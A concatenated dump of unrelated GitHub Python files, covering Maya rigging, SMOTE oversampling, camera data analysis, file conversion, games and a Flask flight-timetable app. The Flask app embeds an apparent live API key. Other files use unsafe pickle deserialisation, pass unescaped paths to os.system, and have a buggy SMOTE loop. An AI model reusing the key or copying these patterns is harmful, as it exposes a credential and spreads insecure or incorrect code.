a proper check to find correct connections)\n \n Args:\n master (str): The driver target\n slave (str): The driven target\n \n \"\"\"\n if not cmds.pluginInfo('matrixNodes', q=1, l=1):\n try: cmds.loadPlugin('matrixNodes')\n except: raise RuntimeError('Unable to load the matrixNodes plugin!')\n \n if mode == \"create\" and not maintainOffset:\n mxMult = cmds.createNode(\"multMatrix\", n=names.addModifier(slave, 'multMatrix'))\n mxDecom = cmds.createNode(\"decomposeMatrix\", n=names.addModifier(slave, 'decomposeMatrix'))\n \n cmds.connectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"), f=1)\n \n # output results on the slave transform\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputTranslate\"), \"{0}.{1}\".format(slave, \"translate\"), f=1)\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputRotate\"), \"{0}.{1}\".format(slave, \"rotate\"), f=1)\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputScale\"), \"{0}.{1}\".format(slave, \"scale\"), f=1)\n for attr in ['x', 'y', 'z']:\n capAttr = attr.upper()\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputTranslate\", capAttr), \"{0}.{1}{2}\".format(slave, \"translate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputRotate\", capAttr), \"{0}.{1}{2}\".format(slave, \"rotate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputScale\", capAttr), \"{0}.{1}{2}\".format(slave, \"scale\", capAttr), f=1)\n cmds.connectAttr(\"{0}.outputShearX\".format(mxDecom), \"{0}.shearXY\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearY\".format(mxDecom), \"{0}.shearXZ\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearZ\".format(mxDecom), \"{0}.shearYZ\".format(slave), f=1)\n \n elif mode == \"create\" and maintainOffset:\n mxMult = cmds.createNode(\"multMatrix\", n=names.addModifier(slave, 'multMatrix'))\n mxDecom = cmds.createNode(\"decomposeMatrix\", n=names.addModifier(slave, 'decomposeMatrix'))\n # multiply\n # 0 - slave world matrix * master world inverse matrix \n # 1 - master world matrix\n # 2 - slave parent inverse matrix\n localOffset = getLocalOffset(master, slave)\n cmds.setAttr( \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"), [localOffset(i, j) for i in range(4) for j in range(4)], type=\"matrix\")\n cmds.connectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[2]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"), f=1)\n \n # output results on the slave transform\n for attr in ['x', 'y', 'z']:\n capAttr = attr.upper()\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputTranslate\", capAttr), \"{0}.{1}{2}\".format(slave, \"translate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputRotate\", capAttr), \"{0}.{1}{2}\".format(slave, \"rotate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputScale\", capAttr), \"{0}.{1}{2}\".format(slave, \"scale\", capAttr), f=1)\n cmds.connectAttr(\"{0}.outputShearX\".format(mxDecom), \"{0}.shearXY\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearY\".format(mxDecom), \"{0}.shearXZ\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearZ\".format(mxDecom), \"{0}.shearYZ\".format(slave), f=1)\n \n # Crude accomodation for joint orient\n if cmds.objectType(slave) == 'joint':\n cmds.setAttr('{0}.jo'.format(slave), 0, 0, 0)\n\n elif mode == \"remove\":\n mxMult = \"\"\n mxDecom = \"\"\n \n outCon = cmds.listConnections(master, s=0)\n for i in outCon:\n if cmds.objectType(i) == \"multMatrix\":\n mxMult = i\n \n inCon = cmds.listConnections(slave, d=0)\n for i in inCon:\n if cmds.objectType(i) == \"decomposeMatrix\":\n mxDecom = i\n \n if mxMult and mxDecom:\n cmds.disconnectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"))\n \n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputTranslate\"), \"{0}.{1}\".format(slave, \"translate\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputRotate\"), \"{0}.{1}\".format(slave, \"rotate\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputScale\"), \"{0}.{1}\".format(slave, \"scale\"))\n\n\ndef listAllParents(node):\n \"\"\"Recursively list all parent transforms\n \"\"\"\n retList = []\n parent = cmds.listRelatives(node, parent=1)\n if parent:\n retList = parent + listAllParents(parent[0])\n return retList\n","repo_name":"jimbo07/openBBlib","sub_path":"rigging_tools/core/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74552689511","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom random import randrange, choice\nfrom sklearn.neighbors import NearestNeighbors\n\ndef SMOTE(T, N, k=5):\n \"\"\"\n Returns (N/100) * n_minority_samples synthetic minority samples.\n Parameters\n ----------\n T : array-like, shape = [n_minority_samples, n_features]\n Holds the minority samples\n N : percetange of new synthetic samples:\n n_synthetic_samples = N/100 * n_minority_samples. Can be < 100.\n k : int. Number of nearest neighbours.\n Returns\n -------\n S : Synthetic samples. array,\n shape = [(N/100) * n_minority_samples, n_features].\n \"\"\"\n n_minority_samples, n_features = T.shape\n\n if N < 100:\n print('if N is less than 100%, randomize the minority class samples as only a random percent of them will be SMOTEd.')\n idx_picked = np.random.choice(range(n_minority_samples), size=N/100)\n T = T[idx_picked, :]\n N = 100\n\n if (N % 100) != 0:\n raise ValueError(\"N must be < 100 or multiple of 100\")\n\n N = int(N/100)\n n_synthetic_samples = N * n_minority_samples\n S = np.zeros(shape=(n_synthetic_samples, n_features))\n\n kNN = NearestNeighbors(n_neighbors = k)\n kNN.fit(T)\n\n new_index = 0\n\n for i in range(n_minority_samples):\n nn = kNN.kneighbors(T[i], return_distance=False)\n for n in range(N): #nn includes T[i], we don't want to select it so we pick again if we pick it\n nn_index = np.random.choice(nn[0][1:])\n for col_idx in range(n_features):\n dif = T[nn_index, col_idx] - T[i, col_idx]\n gap = np.random.uniform(low=0.0, high=1.0)\n '''gap: definition pb? --> original paper states that a new random nb is picked for every col (synthetic sample is in a \"cube\" defined by T[i] and its neighbor)\n however implementations often use the same random nb for all colls (synthetic sample is on the \"segment\" defined by T[i] and its neighbor)\n '''\n S[new_index, col_idx] = S[i, col_idx] + gap * dif\n new_index += 1\n return S\n","repo_name":"thibaultlaugel/useful-macros","sub_path":"python/sampling/smote.py","file_name":"smote.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"259734946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 24 18:03:43 2018\n\n@author: anna\n\"\"\"\n\ncolours = ['red','green','purple','white','yellow','blue']\n\nfor c in colours:\n Label(text=c, relief=RIDGE,width=15).grid(row=r,column=0)\n Entry(bg=c, relief=SUNKEN,width=10).grid(row=r,column=1)\n r = r + 1\n","repo_name":"duyt1001/SciFair2018","sub_path":"tkinterwebpage.py","file_name":"tkinterwebpage.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17064587184","text":"import numpy as np\n\ndef get_camera_tangency_angle(calibration,R,Z):\n angs = np.linspace(0.0,360.0,361)\n\n def refine_angle(angles,start_angle=0.0,R=0.6,Z=-1.25):\n xind = 0\n current_ang = start_angle \n #R = 0.6\n #Z = -1.2 \n for ang in angs: \n X = R*np.cos(ang*2.0*np.pi/360.0)\n Y = R*np.sin(ang*2.0*np.pi/360.0)\n inds = calibration.ProjectPoints([X,Y,Z])\n #print(inds[0,0,0])\n if inds[0,0,0] > xind:\n xind = inds[0,0,0]\n current_ang = ang\n \n return current_ang\n ang = refine_angle(angs,R=R,Z=Z)\n #Second refinement\n angs = np.linspace(ang-10.0,ang+10.0,50)\n ang = refine_angle(angs,ang,R=R,Z=Z) \n #Third refinement\n angs = np.linspace(ang - 0.5,ang + 0.5,50)\n #plt.clf()\n return refine_angle(angs,ang,R=R,Z=Z)*2.0*np.pi/360.0\n \n\ndef project_flux_surface(calibration,tracer,psiN,Zrange=None,Rrange=None):\n \n tan_ang = get_camera_tangency_angle(calibration,0.6,-1.25)\n print(tan_ang)\n \n fline = tracer.trace(1.4,0.0,ds=1e-2,mxstep=10000,psiN=psiN)\n \n Z = np.asarray(fline.Z).squeeze()\n X = np.asarray(fline.R).squeeze()*np.cos(tan_ang)\n Y = np.asarray(fline.R).squeeze()*np.sin(tan_ang)\n print(psiN,fline.R[0],fline.R[-1])\n inds = None\n r = np.asarray(fline.R).squeeze()\n if Zrange is not None:\n zmin = Zrange[0]\n zmax = Zrange[1]\n inds = np.where(Z > zmin)[0]\n #print(inds)\t\n inds = inds[np.where(Z[inds] < zmax)[0]]\n #print(inds)\n Z = Z[inds]\n X = X[inds]\n Y = Y[inds]\n r = r[inds]\n if Rrange is not None:\n rmax = Rrange[0]\n rmin = Rrange[0]\n inds = np.where(r > rmin)[0]\n #print(inds)\n inds = inds[np.where(r[inds] < rmax)[0]]\n #print(inds)\n X = X[inds]\n Y = Y[inds]\n Z = Z[inds]\n\t\t\n objpoints = np.array([[X[i],Y[i],Z[i]] for i in np.arange(len(X))])\n \n return np.array(calibration.ProjectPoints(objpoints)[:,0,:]).squeeze(), r,Z\n \n \ndef cross_correlation(frames,coords=(0,0),delay=0):\n dims = frames[:].shape\n #frames = np.empty((dims[0]-abs(delay),dims[1],dims[2]))\n #Get pixel means and standard deviations\n\n frames_cor = frames - frames.mean(axis=0)\n frames_cor /= frames.std(axis=0)\n\n result = np.zeros((frames.shape[1],frames.shape[2]))\n if delay > 0:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[delay:,coords[0],coords[1]]*frames_cor[0:-delay,x,y])\n elif delay < 0:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[0:delay,coords[0],coords[1]]*frames_cor[-delay:,x,y])\n else:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[:,coords[0],coords[1]]*frames_cor[:,x,y])\n\n return result\n \n \ndef correlation_flow_map(frames,xstride=5,ystride=5,tstride=1,xref=None,yref=None):\n \n if xref is None:\n xref = np.arange(frames.shape[1])[:,np.newaxis]*np.ones(frames.shape[2])\n if yref is None:\n yref = np.arange(frames.shape[2])[np.newaxis,:]*np.ones(frames.shape[1])\n \n \n inds_x = np.arange(frames.shape[1])[::xstride]\n inds_y = np.arange(frames.shape[2])[::ystride]\n \n vx = np.zeros((inds_x.shape[0],inds_y.shape[0]))\n vy = np.zeros((inds_x.shape[0],inds_y.shape[0]))\n \n for i,x in enumerate(inds_x):\n for j,y in enumerate(inds_y):\n C_pp = cross_correlation(frames,(x,y),delay=tstride)\n try:\n inds_max = np.where(C_pp == C_pp.max())\n \n vx[i,j] = xref[x,y] - xref[inds_max[0],inds_max[1]] \n vy[i,j] = yref[x,y] - yref[inds_max[0],inds_max[1]] \n except:\n pass\n \n \n return vx, vy\n \n \n \n \n \n \n \n \n \n \n ","repo_name":"nick-walkden/pyFastcamTools","sub_path":"analysis/util_funcs.py","file_name":"util_funcs.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4078434560","text":"import os\nimport argparse\nimport h5py\nimport numpy as np\nimport sys\n\n\ndef convert_ht2(directory, file_base_name):\n \"\"\"convert the ht2 file to csv using picoquant. Picoquant has to be installed first\"\"\"\n\n os.system('picoquant -vi {in_file} -o {out_file}'.format(\n in_file=os.path.join(directory, file_base_name+'.ht2'),\n out_file=os.path.join(directory, file_base_name+'.csv')))\n\n\ndef convert_mat(directory, file_base_name):\n \"\"\"convert the matlab mat file to csv\"\"\"\n\n with h5py.File(os.path.join(directory, file_base_name+'.mat'), 'r') as file:\n\n sync = np.array(file['Sync'][:, 0], dtype=np.uint8)\n time = np.array(file['Time'][:, 0], dtype=np.uint64)\n\n sync = np.trim_zeros(sync)\n time = np.trim_zeros(time)\n\n np.savetxt(os.path.join(directory, file_base_name+'.csv'),\n np.transpose([sync, time]), fmt=['%d', '%d'], delimiter=',')\n\n print('saved {}'.format(os.path.join(directory, file_base_name+'.csv')))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Convert all ht2 in the specified folder recursively')\n\n parser.add_argument('path', metavar='path', type=str,\n help='base path for conversion',\n default='.')\n\n parser.add_argument('--format', metavar='-f', type=str, default='ht2',\n help='specify the input format. possible: ht2, mat')\n\n args = parser.parse_args()\n\n # Specify the base directory where the script looks for ht2 files recursively\n BASE_DIR = args.path\n\n for (directory, dirnames, filenames) in os.walk(BASE_DIR):\n\n for file_name in filenames:\n\n # check if the file has the ht2 extension\n base_name, ext = os.path.splitext(file_name)\n\n if ext == '.ht2' and args.format == 'ht2':\n convert_ht2(directory, base_name)\n\n if ext == '.mat' and args.format == 'mat':\n convert_mat(directory, base_name)\n","repo_name":"elkaps/single-photon","sub_path":"utils/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34204664540","text":"import pickle\n\n\nclass GameHandler:\n def __init__(self, cards, task):\n self.cards = cards\n self.task = task\n self.is_valid = ''\n self.finished = False\n self.card = self.cards[0]\n self.progress = {}\n for card in self.cards:\n self.progress[card] = {}\n\n def validate_answer(self, answer):\n self.progress[self.card]['attempts'] = self.progress[self.card].get(\n 'attempts', 0) + 1\n if answer.lower() == '':\n self.help_answer()\n elif answer.lower().strip() == self.task.get('answer').lower():\n self.correct_answer()\n if len(self.cards) == 0:\n self.finished = True\n else:\n self.card = self.cards[0]\n elif answer.lower().strip() != self.task.get('answer').lower():\n self.wrong_answer()\n self.task = None\n\n def correct_answer(self):\n self.is_valid = True\n self.progress[self.card]['correct'] = self.progress[self.card].get(\n 'correct', 0) + 1\n self.cards.remove(self.card)\n\n def wrong_answer(self):\n self.is_valid = False\n self.progress[self.card]['wrong'] = self.progress[self.card].get(\n 'wrong', 0) + 1\n if self.progress[self.card].get('attempts') < 3:\n self.cards += [self.cards.pop(0)]\n # else:\n # self.cards.remove(self.card)\n\n def help_answer(self):\n self.is_valid = None\n self.progress[self.card]['help'] = self.progress[self.card].get(\n 'help', 0) + 1\n if self.progress[self.card]['help'] <= 2:\n self.cards.insert(2, self.cards.pop(0))\n # else:\n # self.cards.remove(self.card)\n\n @property\n def serialize(self):\n return {\n 'cards': self.cards,\n 'task': self.task,\n 'card': self.card,\n 'is_valid': self.is_valid,\n 'card_progress': self.progress.get(\n self.card,\n {'attempts': 0, 'help': 0, 'wrong': 0, 'correct': 0}),\n 'game_progress': self.progress,\n 'finished': self.finished\n }\n\n\ndef save_game(game: GameHandler):\n try:\n return pickle.dumps(game)\n except Exception as e:\n raise e\n\n\ndef load_game(binary):\n try:\n return pickle.loads(binary)\n except Exception as e:\n raise e\n","repo_name":"tyevhen/words-guess-game","sub_path":"app/services/game_handler.py","file_name":"game_handler.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27639533927","text":"keys = ['D', 'C', 'H', 'S']\nvals = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K']\n\nthing = open('rummies')\nfirst = thing.readline()\n\nsplit = lambda q: [(x[0], x[1]) for x in q.rstrip().split(', ')]\nsame = lambda x: [(y, suit) for suit in hand for y in hand[suit] if y == x]\nisSet = lambda card: 1 < len(same(card[0])) < 4\nisRun = lambda card, hand: 1 < len(hand[card[1]]) < 4 and inRange(card)\n\ndef inRange(card):\n\tcards = [vals.index(x) for x in hand[card[1]]]\n\n\tfor x in range(len(cards) - 1):\n\t\tif vals.index(card[0]) == cards[x] + 1 == cards[x + 1] - 2:\n\t\t\treturn True\n\t\tif cards[x] + 1 != cards[x + 1]:\n\t\t\tbreak\n\telse:\n\t\treturn cards[0] - 1 == vals.index(card[0]) or cards[-1] + 1 == vals.index(card[0])\n\n\ndef numerize(lizst):\n\tdic = {vals.index(x): x for x in lizst}\n\treturn [dic[x] for x in sorted(dic.keys())]\n\ndef sort(lizst):\n\tdic = {x: [] for x in keys}\n\t[dic[x[1]].append(x[0]) for x in lizst]\n\treturn {x: numerize(dic[x]) for x in keys}\n\ndef garbage(hand):\n\tx = [(y, x) for x in keys for y in hand[x] if len(hand[x]) < 3 and len(same(y)) < 3]\n\n\thand[min(x, key = lambda x: vals.index(x[0]))[1]].pop(0)\n\treturn hand\n\nfor line in thing:\n\thand = sort(split(first))\n\tcards = split(line)\n\n\tfor card in cards:\n\t\tif isRun(card, hand) or isSet(card):\n\t\t\thand[card[1]].append(card[0])\n\t\t\thand = {x: numerize(hand[x]) for x in hand}\n\t\t\tgarbage(hand)\n\n\toutput = ''\n\n\tfor c in range(4, 2, -1):\n\t\toutput += ''.join([y + x + ', ' for x in hand for y in hand[x] if len(hand[x]) == c])\n\n\t\tfor (x, key) in [(x, key) for key in hand for x in hand[key]]:\n\t\t\tif len(same(x)) == c:\n\t\t\t\tfor z in same(x):\n\t\t\t\t\toutput += z[0] + z[1] + ', '\n\t\t\t\t\thand[z[1]].remove(z[0])\n\n\tvals.reverse()\n\ttrash = {x: [] for x in vals}\n\n\tkeys.reverse()\n\t[trash[y].append(x) for x in keys for y in hand[x] if not (len(same(y)) > 2 or len(hand[x]) > 2)]\n\toutput += ''.join(x + key + ', ' for x in vals for key in keys if key in trash[x])\n\n\tprint(output[:-2])\n\tvals.reverse()\n\tkeys.reverse()","repo_name":"ReticentIris/ACSL","sub_path":"rummies2.py","file_name":"rummies2.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72800292394","text":"import json\nimport os\n\ndef create_qa_pairs(file_path):\n with open(file_path, 'r', encoding='latin1') as file:\n data = json.load(file)\n\n # 질문-답변 쌍을 저장할 리스트\n qa_pairs = []\n\n # 이전 메시지를 저장하는 변수\n previous_message = None\n\n for message in data['messages']:\n # 메시지 정보 추출\n sender = message['sender_name'].encode(\"latin1\").decode(\"utf-8\")\n content = message.get('content', '').encode(\"latin1\").decode(\"utf-8\")\n\n # \"오유성\"이 보낸 메시지를 답변으로 사용\n if sender == \"오유성\" and previous_message:\n question = previous_message\n answer = content\n qa_pairs.append(f\"질문: {question}\\n답변: {answer}\\n\")\n\n # 현재 메시지를 다음 루프에서의 이전 메시지로 저장\n previous_message = content\n\n return qa_pairs\n\n# 폴더 내의 모든 JSON 파일을 찾음\nfolder_path = 'C:/Users/OYS/dev/pythonProject/inbox'\nall_qa_pairs = []\n\nfor root, dirs, files in os.walk(folder_path):\n for file_name in files:\n if file_name.endswith('.json'):\n file_path = os.path.join(root, file_name)\n qa_pairs = create_qa_pairs(file_path)\n all_qa_pairs.extend(qa_pairs)\n\n# 모든 질문-답변 쌍을 텍스트 파일로 저장\nwith open('qa_pairs.txt', 'w', encoding='utf-8') as file:\n for pair in all_qa_pairs:\n file.write(pair)\n","repo_name":"oyshallo562/NLP_GPT2_Custom","sub_path":"readjson2.py","file_name":"readjson2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38879922286","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('forum', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='forumuser',\n old_name='avater',\n new_name='avatar',\n ),\n migrations.RenameField(\n model_name='forumuser',\n old_name='self_info',\n new_name='self_intro',\n ),\n migrations.RenameField(\n model_name='forumuser',\n old_name='update',\n new_name='updated',\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='douban',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='github',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='twitter',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n ]\n","repo_name":"onegithuber/myforum","sub_path":"forum/migrations/0002_auto_20151202_2331.py","file_name":"0002_auto_20151202_2331.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71132565994","text":"name=[]\r\nmarks=[]\r\nfor i in range(5):\r\n n=input(\"Enter the name: \")\r\n m=int(input(\"Enter the marks: \"))\r\n name.append(n)\r\n marks.append(m)\r\nh=max(marks)\r\nm=min(marks)\r\nprint(\"Highest marks are=\",h)\r\nprint(\"Lowest marks are=\",m)\r\nfor i in range(5):\r\n if h==marks[i]:\r\n print(\"Student having highest marks is \",name[i])\r\n if m==marks[i]:\r\n print(\"Student having lowest marks is\",name[i])\r\n","repo_name":"Kunal352000/python_program","sub_path":"143.py","file_name":"143.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27085628051","text":"from flask import Flask, render_template, redirect, jsonify, json\nfrom flask_pymongo import PyMongo\nimport pymongo\nimport requests\nimport os\n\nfrom collections import defaultdict, Counter\n\n\napi_key = \"9a7cdb-87fe76\"\n# This allows \"requests\" module to access local server\n# os.environ['NO_PROXY'] = '127.0.0.1'\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n# Use PyMongo to establish Mongo connection\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/flight_app\")\n\n\n# to be used as a global object\nairport_url = 'http://aviation-edge.com/v2/public/airportDatabase'\nap_params = {'key': api_key}\nairport_json = requests.get(airport_url, params=ap_params).json()\n\n# for quick search: O(1)\nairport_ref = {}\nairport_coords = {}\nfor airport in airport_json:\n airport_ref[airport.get('codeIataAirport')\n ] = airport.get('codeIso2Country')\n airport_coords[airport.get('codeIataAirport')] = [float(airport.get('longitudeAirport')),\n float(airport.get('latitudeAirport'))]\n\n\n# Route to render index.html template using data from Mongo\n@app.route(\"/\")\ndef home():\n\n # Find one record of data from the mongo database\n #\n\n # Return template and data\n # render_template(\"index.html\", vacation=destination_data)\n return render_template(\"index.html\")\n\n# Route that will trigger the scrape function\n@app.route(\"/store-data\")\ndef store_data():\n # get a dataset from timetable API with certain parameters\n timetable_url = 'http://aviation-edge.com/v2/public/timetable'\n tt_params = {'key': api_key,\n # 'iataCode': 'DEN'\n 'codeshared': 'Null',\n 'type': 'arrival'\n }\n timetable_json = requests.get(timetable_url, params=tt_params).json()\n\n # get a airport information dataset to join with the dataset from above\n # in order to filter out non-US airports\n # airport_url = 'http://aviation-edge.com/v2/public/airportDatabase'\n # ap_params = {'key': api_key}\n # airport_json = requests.get(airport_url, params=ap_params).json()\n\n # # for quick search: O(1)\n # airport_ref = {}\n # for airport in airport_json:\n # airport_ref[airport.get('codeIataAirport')] = airport.get('codeIso2Country')\n\n # US 61 busiest airports from wikipedia\n major_airports = {'ABQ', 'ANC', 'ATL', 'AUS', 'BDL', 'BHM', 'BNA', 'BOS', 'BUF', 'BUR', 'BWI', 'CLE', 'CLT', 'CMH', 'CVG', 'DAL', 'DCA', 'DEN', 'DFW', 'DTW', 'EWR', 'FLL', 'HNL', 'HOU', 'IAD', 'IAH', 'IND', 'JAX', 'JFK',\n 'LAS', 'LAX', 'LGA', 'MCI', 'MCO', 'MDW', 'MIA', 'MKE', 'MSP', 'MSY', 'OAK', 'OGG', 'OMA', 'ONT', 'ORD', 'PBI', 'PDX', 'PHL', 'PHX', 'PIT', 'RDU', 'RSW', 'SAN', 'SAT', 'SEA', 'SFO', 'SJC', 'SLC', 'SMF', 'SNA', 'STL', 'TPA'}\n\n results = []\n for schedule in timetable_json:\n\n depart_airport = schedule.get('departure').get('iataCode')\n arrival_airport = schedule.get('arrival').get('iataCode')\n\n if (airport_ref[depart_airport] == 'US') and (airport_ref[arrival_airport] == 'US'):\n\n if (depart_airport in major_airports) and (arrival_airport in major_airports):\n\n for airport in airport_json:\n if depart_airport == airport.get('codeIataAirport'):\n schedule['departLat'] = float(\n airport.get('latitudeAirport'))\n schedule['departLon'] = float(\n airport.get('longitudeAirport'))\n schedule['departAirportTimezone'] = airport.get(\n 'timezone')\n schedule['departCityCode'] = airport.get(\n 'codeIataCity')\n\n elif arrival_airport == airport.get('codeIataAirport'):\n schedule['arrivalLat'] = float(\n airport.get('latitudeAirport'))\n schedule['arrivalLon'] = float(\n airport.get('longitudeAirport'))\n schedule['arrivalAirportTimezone'] = airport.get(\n 'timezone')\n schedule['arrivalCityCode'] = airport.get(\n 'codeIataCity')\n\n results.append(schedule)\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"timetable\"]\n # x = mycol.insert_many(result_json)\n\n mycol.create_index([(\"arrival\", pymongo.ASCENDING),\n (\"departure\", pymongo.ASCENDING),\n (\"airline\", pymongo.ASCENDING),\n (\"flight\", pymongo.ASCENDING),\n (\"codeshared\", pymongo.ASCENDING),\n (\"type\", pymongo.ASCENDING)\n ], unique=True)\n count_insert = 0\n count_update = 0\n for data in results:\n\n try:\n # assuming that only no codeshared flight is a real one.\n data_insertion = mycol.insert_one(data)\n\n if (data_insertion.inserted_id):\n count_insert += 1\n\n except: # if the duplicate found (status would be different)\n # if 'status' is different to an existing document\n\n cursor = mycol.find({\"arrival\": data.get(\"arrival\"),\n \"departure\": data.get(\"departure\"),\n \"airline\": data.get(\"airline\"),\n \"flight\": data.get(\"flight\"),\n \"codeshared\": data.get(\"codeshared\")},\n {\"_id\": 1})\n status = {\"$set\": {\"status\": data.get(\"status\")}}\n\n for update in cursor:\n data_update = mycol.update_one(update, status)\n\n if (data_update.modified_count != 0):\n count_update += data_update.modified_count\n\n return f\"Posting Done (insert: {count_insert} / update: {count_update} records)\"\n\n\n@app.route(\"/get-storeddata\")\ndef get_storeddata():\n\n results = []\n data = mongo.db.timetable.find({}, {\"_id\": 0})\n\n for schedule in data:\n # schedule['_id'] = str(schedule['_id'])\n results.append(schedule)\n\n return jsonify(results)\n\n\n# # Route that will trigger the scrape function\n# @app.route(\"/post-timetable\")\n# def post_timetable():\n# # Get dataset for both arrival and departure\n# base_url = 'http://aviation-edge.com/v2/public/timetable'\n# params = {'key': api_key,\n# # 'iataCode': 'DEN'\n# 'codeshared': 'Null',\n# 'type': 'arrival'\n# }\n\n# result_json = requests.get(base_url, params=params).json()\n\n# # insert to the Mongo database\n# myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n# mydb = myclient[\"flight_app\"]\n# mycol = mydb[\"timetable\"]\n# # x = mycol.insert_many(result_json)\n\n# mycol.create_index([(\"arrival\", pymongo.ASCENDING),\n# (\"departure\", pymongo.ASCENDING),\n# (\"airline\", pymongo.ASCENDING),\n# (\"flight\", pymongo.ASCENDING),\n# (\"codeshared\", pymongo.ASCENDING),\n# (\"type\", pymongo.ASCENDING)\n# ], unique=True)\n\n# for data in result_json:\n# # if data.get('codeshared') is None:\n# try:\n# # assuming that only no codeshared flight is a real one.\n# mycol.insert_one(data)\n# except: # if the duplicate found (status would be different)\n# # if 'status' is different to an existing document\n\n# cursor = mycol.find({\"arrival\": data.get(\"arrival\"),\n# \"departure\": data.get(\"departure\"),\n# \"airline\": data.get(\"airline\"),\n# \"flight\": data.get(\"flight\"),\n# \"codeshared\": data.get(\"codeshared\")},\n# {\"_id\": 1})\n# status = {\"$set\": {\"status\": data.get(\"status\")}}\n\n# for update in cursor:\n# mycol.update_one(update, status)\n\n# return f\"Posting Done ({len(result_json)} records)\"\n\n\n# @app.route(\"/get-timetable\")\n# def get_timetable():\n\n# results = []\n# timetable = mongo.db.timetable.find({}, {\"_id\": 0})\n\n# for schedule in timetable:\n# # schedule['_id'] = str(schedule['_id'])\n# results.append(schedule)\n\n# return jsonify(results)\n\n\n# Trim the stored data to easily visualize the arcs between source and target airports\n@app.route(\"/summarize-timetable\")\ndef summarize_timetable():\n\n resp_json = 